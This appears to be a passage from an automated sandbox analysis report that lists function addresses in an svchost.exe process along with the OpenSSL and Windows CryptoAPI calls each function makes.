Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B590 CRYPTO_free,53_2_00007FFDA338B590
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3389620 CRYPTO_malloc,ERR_new,ERR_set_debug,53_2_00007FFDA3389620
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343650 CRYPTO_THREAD_unlock,53_2_00007FFDA3343650
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A1650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33A1650
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B5E0 CRYPTO_free,53_2_00007FFDA338B5E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335B5F0 CRYPTO_free,53_2_00007FFDA335B5F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,53_2_00007FFDA338D5F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B4A0 CRYPTO_free,CRYPTO_free,53_2_00007FFDA338B4A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335B4B0 CRYPTO_zalloc,53_2_00007FFDA335B4B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3389540 OPENSSL_cleanse,CRYPTO_free,53_2_00007FFDA3389540
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3345550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,53_2_00007FFDA3345550
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AB550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33AB550
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33434E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,53_2_00007FFDA33434E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338D4E0 ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA338D4E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33974E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33974E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332B500 CRYPTO_free,53_2_00007FFDA332B500
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3335500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,53_2_00007FFDA3335500
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3373C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3373C30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3323C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA3323C40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A9C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33A9C40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,53_2_00007FFDA3329C50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3321C50 CRYPTO_zalloc,53_2_00007FFDA3321C50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3321BE0 CRYPTO_zalloc,53_2_00007FFDA3321BE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3327BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3327BEE
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,53_2_00007FFDA333BC10
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,53_2_00007FFDA339BAA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3361A60 CRYPTO_free,53_2_00007FFDA3361A60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343A70 CRYPTO_get_ex_data,53_2_00007FFDA3343A70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3333A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3333A70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,53_2_00007FFDA3399B33
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA3399B4A
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3347B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,53_2_00007FFDA3347B50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336BB00 CRYPTO_free,53_2_00007FFDA336BB00
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33619A0 CRYPTO_malloc,53_2_00007FFDA33619A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33999B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA33999B3
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33579D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33579D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,53_2_00007FFDA3399985
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,53_2_00007FFDA339999C
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,53_2_00007FFDA3329A20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337DA40 CRYPTO_memcmp,53_2_00007FFDA337DA40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332DA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,53_2_00007FFDA332DA50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33938C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,53_2_00007FFDA33938C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B8C0 CRYPTO_free,53_2_00007FFDA338B8C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33818D0 CRYPTO_free,53_2_00007FFDA33818D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA335B8D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33578D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33578D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA339985F
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3327870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,53_2_00007FFDA3327870
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B870 CRYPTO_free,53_2_00007FFDA338B870
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3387920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3387920
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3331950 CRYPTO_free,CRYPTO_strdup,53_2_00007FFDA3331950
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33718E9 CRYPTO_malloc,CRYPTO_free,53_2_00007FFDA33718E9
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3355FA0 CRYPTO_realloc,53_2_00007FFDA3355FA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33ABFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,53_2_00007FFDA33ABFA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA336FFD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332DF70 CRYPTO_malloc,BIO_snprintf,53_2_00007FFDA332DF70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,53_2_00007FFDA3329F90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334A030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,53_2_00007FFDA334A030
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3387FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA3387FE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332BFF0 CRYPTO_THREAD_run_once,53_2_00007FFDA332BFF0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3362000 CRYPTO_free,53_2_00007FFDA3362000
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3360010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free,53_2_00007FFDA3360010
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334DEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,53_2_00007FFDA334DEA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3321EC0 CRYPTO_free,53_2_00007FFDA3321EC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3377EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA3377EC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3359E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,53_2_00007FFDA3359E60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3361E70 CRYPTO_realloc,53_2_00007FFDA3361E70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3395E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA3395E80
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3387E90 CRYPTO_malloc,COMP_expand_block,53_2_00007FFDA3387E90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3349F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy,53_2_00007FFDA3349F30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3391F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3391F30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343F00 CRYPTO_free,CRYPTO_strdup,53_2_00007FFDA3343F00
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA3399DA6
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3327DA0 CRYPTO_free,53_2_00007FFDA3327DA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3325DB0 CRYPTO_malloc,53_2_00007FFDA3325DB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,53_2_00007FFDA339BDB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336BD60 CRYPTO_zalloc,53_2_00007FFDA336BD60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,53_2_00007FFDA3343D70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3375E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA3375E20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343E50 CRYPTO_free,CRYPTO_memdup,53_2_00007FFDA3343E50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,53_2_00007FFDA338DDE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3349E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,53_2_00007FFDA3349E00
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332DE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,53_2_00007FFDA332DE10
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3373E10 CRYPTO_malloc,CRYPTO_free,53_2_00007FFDA3373E10
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,53_2_00007FFDA3399CAA
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335FCB0 CRYPTO_free,53_2_00007FFDA335FCB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3349CC0 EVP_MAC_CTX_free,CRYPTO_free,53_2_00007FFDA3349CC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,53_2_00007FFDA3399CC1
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3391C70 CRYPTO_realloc,53_2_00007FFDA3391C70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA338FC90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3375D30 CRYPTO_free,53_2_00007FFDA3375D30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55CBA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,53_2_00007FFDA55CBA86
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA559E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,53_2_00007FFDA559E580
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA559E570 CryptHashData,53_2_00007FFDA559E570
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55AC4D0 memset,BCryptGenRandom,53_2_00007FFDA55AC4D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55CB4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,53_2_00007FFDA55CB4E0
